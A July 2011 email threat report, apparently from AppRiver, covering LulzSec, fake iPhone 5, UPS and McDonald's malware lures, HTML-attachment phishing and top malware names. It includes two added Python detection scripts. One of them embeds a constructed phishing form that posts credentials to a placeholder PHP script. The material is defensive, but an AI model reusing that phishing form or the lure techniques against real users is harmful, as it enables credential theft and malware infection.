Threat and Spamscape Report
July 2011
What We Saw in June
Well, it's been a wild ride these past couple of months with quite a few "Anti-Sec" attacks, many of which were focused on well-known entities such as the US Senate, CIA affiliates, and big corporations. The attacks were led by a group called "LulzSec" or "Lulz Security." The six-member team launched attack after attack for 50 days, and as quickly as their LulzBoat appeared it would disappear into the horizon, leaving questions and chaos in its wake. Here are a few other notable happenings from the month of June:
- June began with an email campaign touting the new iPhone 5. The only problem was that there is no such thing as the iPhone 5. Instead, the email campaign utilized a Trojan horse designed to attack host PCs.
- Email-delivered virus activity ignited on June 9th when AppRiver filters started to catch millions of pieces per day. Though it is normal for virus traffic patterns to rise and fall with the associated botnet activity, this wave seems to be remaining strong.
- The McDonald's brand is generally used for an attack about once a year, and those attacks seem to stand out a little differently from most. Perhaps that's due to it being a popular food chain and not the usual tech gadget scam? Regardless, emails began circulating in June claiming to be coupons for free food from McDonald's. Of course the emails were not coupons and were instead tainted with malware. They were shut down by AppRiver's own computer health department.
- HTML spam, virus, and phishing attacks have become very popular among the cybercriminal community. The attachments are used in an attempt to trick recipients into believing they are on a legitimate webpage and to obfuscate the attackers' true intentions.
Total Email Traffic Volume
This chart represents both total and spam traffic throughout the month of June. Spam traffic remained level throughout June.
Tests Failed
This chart represents the number of times messages failed various tests over the past month. Keep in mind that many messages failed multiple tests; hence the total from these charts will surpass the total individual pieces of spam seen during the month of June.
Regions of Origin
This graph represents both spam and malicious email traffic by region. North America gained two percentage points and claimed a larger portion of the total amount of spam hitting our inbound filters. We also saw the spam originating from Australia and Oceania increase for the second straight month. While Australia and Oceania's total is still less than five percent, their spam output nearly doubled over last month.
Top Ten Countries of Origin
This chart represents the top ten countries from which spam originated during June. The top ten major players in spam output remained the same; however, the Republic of Korea jumped two spots to take the number three spot.
Top Email-Delivered Viral Threats
These are the top 20 malware threats we saw last month in order of frequency, with the most frequent appearing in the top position. The virus names that begin with "X." signify rules that were written by AppRiver Analysts. (This does not mean that other anti-virus vendors didn't eventually have definitions in place for these viruses; it simply means that AppRiver often had protection in place before many of them.)
- X.W32.Sasfis.pak
- X.UPX.App.pakuber
- W32\Mydoom.O
- X.W32.Buzus.pak
- W32\Mydoom.R_worm
- X.W32.Netsky.Q
- W32\Merond.O_worm
- W32\Mydoom.N
- W32\Netsky.C
- X.UPX.App.pakuberb
- X.html.fdphish
- X.win32.worm.
- HTML\Phishing.Gen_trojan
- W32\Mydoom.Q_worm
- W32\Netsky.C_worm
- W32\Fruspam.GD
- W32\Fruspam.CV
- W32\Netsky.Z
- W32\Fruspam.ED
30 Day Virus Activity
This chart represents email-borne virus and malware activity during the month of June as seen by AppRiver filters. The month started off slow where email-borne virus messages were concerned, but on June 9th the surge surfaced again and has yet to subside. In the past month we have quarantined just shy of 50 million email-borne viruses.
Image Spam
The chart below represents total image spam seen by AppRiver filters during June. The obfuscation tactic of using image attachments in an attempt to deliver spam content tapered off this month, falling six percent from last month.
Premature News of an iPhone 5 Release
Timed perfectly with the World Wide Developers Conference, malware authors decided to jump on the bandwagon and sent out tons of malicious emails claiming to be from Apple. Messages were addressed from noreply@apple.com with the subject line "Finally. The amazing iPhone 5. Now available in black edition." The email shown below touts the new device as being slimmer, faster and sleeker. What it doesn't tell you is that the iPhone 5 does not exist.
The ad, of course, is riddled with links pointing to an exploited web page that hosted a file named iphone5.gif.exe. The file was meant to infect PCs in order to create a backdoor into victims' machines. I'm afraid that anyone who is looking forward to getting a new iPhone 5G will have to wait until late 2012. Until then, we here at AppRiver will be on to these fakes.
Back to the Grind
On June 9th we went from seeing around 200K virus messages per day to seeing approximately 250K per hour, and there is no sign of withdrawal in sight. It all (re)began with a malware campaign pretending to be from UPS. Not a big surprise there, since this tried and apparently true delivery disguise has been going on for several years. When timed well, I can see how recipients expecting packages from UPS might fall victim to the scam.
The file was named UPS_Document.zip, from a campaign we identified as being a variant of the Kryptik family of Trojans. The files were designed to be the stealth and muscle to break open new backdoors into infected PCs. The new backdoor would then be used to download and install a variety of other malware such as banking Trojans and keyloggers. The campaign came on the heels of another smaller, less successful campaign from the same authors the weekend prior. That smaller campaign pretended to come from another delivery service - DHL. But it contained errors, which is probably why we didn't see many of them. These files, named DHL mail.zip, were included in the raw message headers; however, they were inaccessible to most email clients. This allowed a malicious signature to remain intact but rendered the emails essentially harmless. Some of them, like the one pictured above, did in fact include an accessible attachment, which made them much more dangerous. Happily for AppRiver clients, we were blocking them out of the gate.
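Both the iPhone 5 lure (iphone5.gif.exe) and the UPS lure (UPS_Document.zip carrying an executable) rely on the attachment looking like a picture or a document. The following is an added example written for this report, not AppRiver's filtering code: a pair of attachment-level checks that flag a double extension ending in an executable type and an executable member inside a ZIP payload. The ZIP contents and the member name UPS_Document.exe are constructed for the demonstration.

```python
"""Attachment-name and archive-content checks for mail filtering (added example)."""
import io
import zipfile

# Extensions Windows will execute when double-clicked (non-exhaustive).
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs"}
# Harmless-looking extensions commonly used as the decoy in a double extension.
DECOY_EXTS = {".gif", ".jpg", ".jpeg", ".png", ".pdf", ".doc", ".txt"}


def double_extension(name):
    """True for names like iphone5.gif.exe: a decoy extension hiding an executable one."""
    parts = name.lower().rsplit(".", 2)
    if len(parts) < 3:
        return False
    return f".{parts[1]}" in DECOY_EXTS and f".{parts[2]}" in EXECUTABLE_EXTS


def executables_in_zip(data):
    """Return member names inside a ZIP payload that carry an executable extension."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        # Not a valid archive; leave that to a separate file-type check.
        return []
    return [n for n in names if any(n.lower().endswith(e) for e in EXECUTABLE_EXTS)]


def assess_attachment(name, data):
    """Return a list of human-readable reasons the attachment looks malicious (empty if none)."""
    reasons = []
    if double_extension(name):
        reasons.append("double extension hides executable type")
    if name.lower().endswith(".zip"):
        hits = executables_in_zip(data)
        if hits:
            reasons.append("archive contains executable: " + ", ".join(hits))
    return reasons


def build_sample_zip():
    """Constructed ZIP with an .exe member, standing in for UPS_Document.zip (not the real file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("UPS_Document.exe", b"constructed placeholder bytes, not a real program")
    return buf.getvalue()


if __name__ == "__main__":
    print(assess_attachment("iphone5.gif.exe", b""))
    print(assess_attachment("UPS_Document.zip", build_sample_zip()))
    print(assess_attachment("newsletter.pdf", b"%PDF-1.4"))
```

The archive check reads only the central directory, so it costs little per message; a production filter would also inspect the member's actual file type rather than trusting its name.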
Food, Folks, and Malware
Just a week ago we began seeing something in our traps that may have been rather tempting to hungry, groggy email recipients. A malware campaign purporting to come from "Celebration at McDonald's" was offering free McDonald's food to all of its addressees. The attachment labeled Invitation_Card_ 15584.zip was supposed to be a coupon for said free food, but instead it contained a malicious Trojan. The email tempted victims by claiming McDonald's was having a "free supper day" on June 29th with a free menu consisting of a Double-Cheeseburger, World Famous Fries, a salad, a McFlurry, and a McCafe Cappuccino. Subject lines included "Tasty and free food for each"; "We have brand new dishes to give to you for free"; "We invite you to the day of free food," and "Free helpings of your favorite dishes," among several others.
Phishing Attacks Evolve to Avoid Detection by Browsers
For quite a while now we have been seeing a steady increase in the use of HTML attachments to deliver malicious content. Typically, a phisher will set up a fake login screen on a web page and then send spam emails with links to the site to as many people as possible in an attempt to lure them into handing over their information. In this example, the phisher has instead delivered the web page itself (as an HTML attachment) to victims so that it can be viewed locally. This method of attaching the HTML file has become very popular over the past year or so as browsers such as Mozilla Firefox, IE and Chrome have become better at detecting phishing sites. Because the page is opened from disk rather than fetched from a URL, the browser's built-in anti-phishing protection never gets a chance to check it.
Once the user is fooled into opening and completing the form in the HTML attachment the information is typically sent via a POST request to a PHP script hosted on the bad guys' webserver or often someone else's hacked webserver. All of the individual's personal information is collected through the POST request to the webserver and the PHP script will serve as a redirect, taking the person to the actual website of whichever company was just phished. By landing the individual at the real website the phisher is attempting to avoid suspicion of any wrongdoing in the transaction. Fortunately for those of us with spam and virus filtering for our email, these attachments are fairly easy to detect.
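The structure described above is what makes these attachments easy to catch at the mail gateway: a standalone HTML document with a login form whose action POSTs to a remote script, usually PHP, on a host unrelated to the brand being impersonated. The following is an added example written for this report, not AppRiver's own detection code. It parses an HTML attachment body with the standard library, collects every form, and flags a password field that is submitted to a remote host or to a remote .php script. The phishing and benign HTML samples, including the host example.invalid, are constructed for the demonstration.

```python
"""Flag HTML e-mail attachments that carry a credential-harvesting form (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormCollector(HTMLParser):
    """Collect every <form> with its action/method and the input types inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": (a.get("action") or "").strip(),
                "method": (a.get("method") or "get").lower(),
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append((a.get("type") or "text").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def scan_html_attachment(html):
    """Return (is_suspicious, reasons) for one HTML attachment body."""
    parser = _FormCollector()
    parser.feed(html)
    parser.close()
    reasons = []
    for form in parser.forms:
        target = urlparse(form["action"])
        remote = target.scheme in ("http", "https") and bool(target.netloc)
        # A page opened from a local file has no legitimate reason to send
        # a password to a remote host; that is exactly the pattern described above.
        if remote and "password" in form["inputs"]:
            reasons.append(f"password form submits to remote host {target.netloc}")
        if remote and target.path.lower().endswith(".php"):
            reasons.append(f"form action is a remote PHP script: {form['action']}")
    return (bool(reasons), reasons)


# Constructed sample of a phishing attachment (not a real campaign artifact).
PHISH_SAMPLE = """<html><body>
<h1>Sign in to your account</h1>
<form method="post" action="http://example.invalid/login/process.php">
  Email: <input type="text" name="email"><br>
  Password: <input type="password" name="pass"><br>
  <input type="submit" value="Sign In">
</form></body></html>"""

# Constructed benign newsletter-style attachment with no form at all.
BENIGN_SAMPLE = """<html><body>
<p>Thanks for subscribing. Read this month's issue on our site.</p>
<a href="http://example.invalid/newsletter/july">July issue</a>
</body></html>"""


if __name__ == "__main__":
    print(scan_html_attachment(PHISH_SAMPLE))
    print(scan_html_attachment(BENIGN_SAMPLE))
```

A gateway rule built on this would run on text/html attachments only, since the same form on a live web page is normal; the redirect to the real brand's site that follows the POST is invisible to the filter and does not need to be modelled.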
Was it Worth the Lulz?
For a period of 50 days beginning in the month of May, a group of six individuals calling themselves LulzSec began attacking public-facing webservers and pivoting through them, exposing critical company data. LulzSec first came on the scene by exposing the names, phone numbers, DoBs, emails, and passwords for everyone who had applied to be a contestant on the popular British talent show X Factor. This was followed by the passwords and log-in information of Fox.com and its affiliates three days later. From there, they went on to expose information for PBS.org, several online gaming sites, the US Senate, a couple of FBI affiliate sites, and a long hateful attack against everything Sony. All the while these individuals maintained a very active Twitter feed announcing everything they did and even set up a phone number, which they actually answered at times to take requests. The group claimed that they were just doing it "for the Lulz". Their stated goal was to prove that security in essence didn't exist in the manner it needed to on most networks, and they were going to continue proving their point.
A lot of people on the Internet began following LulzSec and even siding with them, as if they were a sort of Robin Hood of the Internet, for pointing out that big corporations and big government didn't take care of sensitive information to the degree that they should. The only thing is that they exposed the private information of hundreds of thousands of otherwise innocent people who had nothing to do with their "cause". It is one thing to point out flaws in security when done in a proper ethical manner; this is another.